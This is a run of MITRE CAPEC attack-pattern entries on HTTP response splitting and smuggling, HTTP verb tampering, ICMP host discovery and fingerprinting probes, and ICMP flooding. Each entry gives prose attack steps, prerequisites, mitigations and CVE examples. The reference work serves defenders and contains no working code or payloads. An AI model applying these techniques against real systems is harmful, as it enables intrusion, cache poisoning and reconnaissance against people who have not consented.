Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)

Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.

Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.

Example Instances

When using Undertow, a Java-based web server in Red Hat's Jboss Enterprise Application Platform version 7.0, the code responsible for parsing HTTP requests permitted invalid characters, that could allow the injection of data into HTTP responses from Undertow to clients when used in tandem with a proxy; allowing for web-cache poisoning, XSS, and confidentiality violation of sensitive information from other HTTP requests sent to Undertow. See also: CVE-2017-2666

Mozilla Firefox and Thunderbird before 1.5.04, with various proxy servers, interpreted HTTP responses differently if HTTP response headers included a space between the header name and colon or if HTTP 1.1 headers were sent through a proxy configured with HTTP 1.0, allowing for HTTP Smuggling vulnerability. See also: CVE-2006-2786

Related Weaknesses

CWE-ID	Weakness Name
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
436	Interpretation Conflict
444	Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Notes

Relationship

HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.

Terminology

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
27	HTTP Response Smuggling

References

[REF-38] "HTTP 1.1 Specification (RFC 2616)". IETF RFC. <http://www.ietf.org/rfc/rfc2616.txt>.

[REF-117] "HTTP Response Smuggling". Beyond Security. <http://www.securiteam.com/securityreviews/5CP0L0AHPC.html>.

[REF-675] Robert Auger. "HTTP Response Smuggling". The Web Application Security Consortium. 2011-02. <http://projects.webappsec.org/w/page/13246930/HTTP%20Response%20Smuggling>. URL validated: 2021-10-06.

[REF-676] Kazuho Oku. "Mozilla Foundation Security Advisory 2006-33 HTTP response smuggling". Mozilla Corporation. 2006-06-01. <https://www.mozilla.org/en-US/security/advisories/mfsa2006-33/>. URL validated: 2021-10-06.

[REF-677] "Testing for HTTP Splitting Smuggling". Open Web Application Security Project. <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html>. URL validated: 2021-10-06.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Likelihood_Of_Attack, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Resources_Required, Skills_Required, Typical_Severity
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Alternate_Terms, Extended_Description, Related_Weaknesses

CAPEC-34: HTTP Response Splitting

Attack Pattern ID: 34

Abstraction: Detailed

View customized information:

Description

See CanPrecede relationships for possible consequences.

Extended Description

Malicious user input is injected into various standard and/or user defined HTTP headers within a HTTP Response through use of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters, and unique character encoding.

A single HTTP response ends up being split as two or more HTTP responses by the targeted client HTTP agent parsing the original maliciously manipulated HTTP response. This allows malicious HTTP responses to bypass security controls in order to implement malicious actions and provide malicious content that allows access to sensitive data and to compromise applications and users. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.

This differs from CAPEC-105 HTTP Request Splitting, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Splitting is an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	220	Client-Server Protocol Manipulation
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	105	HTTP Request Splitting
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	141	Cache Poisoning
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	154	Resource Location Spoofing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets
Techniques
Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data (in the form of HTTP headers with custom strings and embedded web scripts and objects) into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP responses by intermediary and front-end client/victim HTTP agents. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses to intermediary and front-end client/victim HTTP agents, will be observed to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

Techniques

Continue the monitoring of HTTP traffic.

Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:

additional HTTP Requests with their own headers
malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)
adversary chosen encoding (e.g., UTF-7)

to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.

Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.

Exploit

Perform HTTP Response Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.
Techniques
Leverage techniques identified in the Experiment Phase.

Prerequisites

Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.

HTTP headers capable of being user-manipulated.

HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses.

Skills Required

[Level: Medium]

Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.

[Level: Medium]

Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.

[Level: Medium]

Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.

Resources Required

Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages.

Indicators

Differences in responses processed by the two agents with multiple responses to a single request in the web logs. This requires careful monitoring or a capable log analysis tool.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data

Mitigations

Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.

Configuration: front-end HTTP agents notice ambiguous requests.

Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.

Configuration: Disable reuse of back-end connections.

Configuration: Use HTTP/2 for back-end connections.

Configuration: Use the same web server software for front-end and back-end server.

Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.

Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)

Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.

Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.

Example Instances

In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. See also: CVE-2006-0207

Related Weaknesses

CWE-ID	Weakness Name
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
113	Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
138	Improper Neutralization of Special Elements
436	Interpretation Conflict

Notes

Relationship

HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.

Terminology

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
25	HTTP Response Splitting

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-117] "HTTP Response Smuggling". Beyond Security. <http://www.securiteam.com/securityreviews/5CP0L0AHPC.html>.

[REF-680] Robert Auger. "HTTP Response Splitting". The Web Application Security Consortium. 2010. <http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting>. URL validated: 2021-10-14.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Payload_Activation_Impact, Probing_Techniques, Related_Attack_Patterns, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Status, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Extended_Description

CAPEC-274: HTTP Verb Tampering

Attack Pattern ID: 274

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	220	Client-Server Protocol Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The targeted system must attempt to filter access based on the HTTP verb used in requests.

Resources Required

The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server.

Mitigations

Design: Ensure that only legitimate HTTP verbs are allowed.

Design: Do not use HTTP verbs as factors in access decisions.

Related Weaknesses

CWE-ID	Weakness Name
302	Authentication Bypass by Assumed-Immutable Data
654	Reliance on a Single Factor in a Security Decision

References

[REF-118] Arshan Dabirsiaghi. "Bypassing Web Authentication and Authorization with HTTP Verb Tampering: How to inadvertently allow attackers full access to your web application". Aspect Security. <http://mirror.transact.net.au/sourceforge/w/project/wa/waspap/waspap/Core/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-294: ICMP Address Mask Request

Attack Pattern ID: 294

Abstraction: Detailed

View customized information:

Description

Extended Description

Many modern operating systems will not respond to ICMP type 17 messages for security reasons. Determining whether a system or router will respond to an ICMP Address Mask Request helps the adversary determine operating system or firmware version. Additionally, because these types of messages are rare, they are easily spotted by intrusion detection systems. Many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 17 and egress ICMP type 18 messages.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to send an ICMP type 17 query (Address Mask Request) to a remote target and receive an ICMP type 18 message (ICMP Address Mask Reply) in response. Generally, modern operating systems will ignore ICMP type 17 messages, however, routers will commonly respond to this request.

Resources Required

The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pp. 53-54. 6th Edition. McGraw Hill. 2009.

[REF-139] J. Mogul and J. Postel. "RFC950 - Internet Standard Subnetting Procedure". 1985-08. <http://www.faqs.org/rfcs/rfc950.html>.

[REF-123] J. Postel. "RFC792 - Internet Control Messaging Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc792.html>.

[REF-125] Mark Wolfgang. "Host Discovery with Nmap". 2002-11. <http://nmap.org/docs/discovery.pdf>.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 3.7.2 ICMP Probe Selection, pg. 70. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-285: ICMP Echo Request Ping

Attack Pattern ID: 285

Abstraction: Detailed

View customized information:

Description

Extended Description

Performing this operation for a range of hosts on the network is known as a 'Ping Sweep'. While the Ping utility is useful for small-scale host discovery, it was not designed for rapid or efficient host discovery over large network blocks. Other scanning utilities have been created that make ICMP ping sweeps easier to perform. Most networks filter ingress ICMP Type 8 messages for security reasons. Various other methods of performing ping sweeps have developed as a result. It is important to recognize the key security goal of the adversary is to discover if an IP address is alive, or has a responsive host. To this end, virtually any type of ICMP message, as defined by RFC 792 is useful. An adversary can cycle through various types of ICMP messages to determine if holes exist in the firewall configuration. When ICMP ping sweeps fail to discover hosts, other protocols can be used for the same purpose, such as TCP SYN or ACK segments, UDP datagrams sent to closed ports, etc.

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to send an ICMP type 8 query (Echo Request) to a remote target and receive an ICMP type 0 message (ICMP Echo Reply) in response. Any firewalls or access control lists between the sender and receiver must allow ICMP Type 8 and ICMP Type 0 messages in order for a ping operation to succeed.

Skills Required

[Level: Low]

The adversary needs to know certain linux commands for this type of attack.

Resources Required

Scanners or utilities that provide the ability to send custom ICMP queries.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Mitigations

Consider configuring firewall rules to block ICMP Echo requests and prevent replies. If not practical, monitor and consider action when a system has fast and a repeated pattern of requests that move incrementally through port numbers.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pp. 44-51. 6th Edition. McGraw Hill. 2009.

[REF-123] J. Postel. "RFC792 - Internet Control Messaging Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc792.html>.

[REF-124] R. Braden, Ed.. "RFC1122 - Requirements for Internet Hosts - Communication Layers". 1989-10. <http://www.faqs.org/rfcs/rfc1122.html>.

[REF-125] Mark Wolfgang. "Host Discovery with Nmap". 2002-11. <http://nmap.org/docs/discovery.pdf>.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 3.5.2 Ping Scan (-SP), pg. 58. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-330: ICMP Error Message Echoing Integrity Probe

Attack Pattern ID: 330

Abstraction: Detailed

View customized information:

Description

An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or "Quoted" from the originating request that generated the error message.

Extended Description

A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.

For this purpose "Port Unreachable" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value.

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable..

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-123] J. Postel. "RFC792 - Internet Control Messaging Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc792.html>.

[REF-124] R. Braden, Ed.. "RFC1122 - Requirements for Internet Hosts - Communication Layers". 1989-10. <http://www.faqs.org/rfcs/rfc1122.html>.

[REF-262] Ofir Arkin. "A Remote Active OS Fingerprinting Tool using ICMP". The Sys-Security Group. 2002-04. <http://ofirarkin.files.wordpress.com/2008/11/login.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-329: ICMP Error Message Quoting Probe

Attack Pattern ID: 329

Abstraction: Detailed

View customized information:

Description

Extended Description

For this purpose "Port Unreachable" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.

This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: "Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...]." This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because "older" or "legacy" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable..

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-123] J. Postel. "RFC792 - Internet Control Messaging Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc792.html>.

[REF-124] R. Braden, Ed.. "RFC1122 - Requirements for Internet Hosts - Communication Layers". 1989-10. <http://www.faqs.org/rfcs/rfc1122.html>.

[REF-262] Ofir Arkin. "A Remote Active OS Fingerprinting Tool using ICMP". The Sys-Security Group. 2002-04. <http://ofirarkin.files.wordpress.com/2008/11/login.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-487: ICMP Flood

Attack Pattern ID: 487

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	125	Flooding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server.

Mitigations

To mitigate this type of an attack, an organization can enable ingress filtering. Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
